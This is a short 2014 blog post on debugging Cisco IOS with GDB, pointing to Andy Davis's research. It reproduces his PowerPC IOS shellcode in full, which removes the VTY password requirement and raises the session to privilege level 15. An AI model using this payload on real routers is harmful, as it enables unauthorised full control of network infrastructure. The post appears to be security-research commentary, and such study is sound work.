November 23rd, 2014

Step by Step Debugging Cisco IOS

This is kinda cool — I didn’t know that you could do this directly with GDB. Andy Davis has posted step by step instructions for debugging Cisco IOS with GDB. He’s done some other pretty interesting things lately including posting a remote exploit of IOS, and as a follow-up to the exploit he posted information on how his IOS shellcode works.

Other than a minor gdb patch, and a couple idiosyncrasies with the debugging process (you have to manually replace the instructions overwritten by breakpoint interrupts), from his instructions it looks like it’s pretty straightforward to do. I’m not sure of the details on how it’s able to attach to the kernel, but I’d like to try it out sometime. I wonder if some of this info will spur other security people to do more IOS research.

Andy’s IOS shellcode:

.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis 4,vty_infoha
la 4,vty_infol(4)
xor 8,8,8 //Clear r8
lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove
                         //the requirement to enter a password
subi 8,8,1 //Set r8 to be 0xffffffff
addi 7,7,233 //Add second offset in two steps to
                         //avoid nulls in the shellcode
stw 8,1226(7) //Write 0xffffffff to second offset to
                         //priv escalate to level 15
                         //(technically this should be 0xff100000
                         //but 0xffffffff works and is more efficient)
mr 3,8 //Use 0xffffffff as a parameter
                         //to pass to terminate()
lis 4,terminateha
la 4,terminatel(4)
mtctr 4
bctr //terminate "this process" 

Leave a Response

Imhotep theme designed by Chris Lin. Proudly powered by Wordpress.
XHTML | CSS | RSS | Comments RSS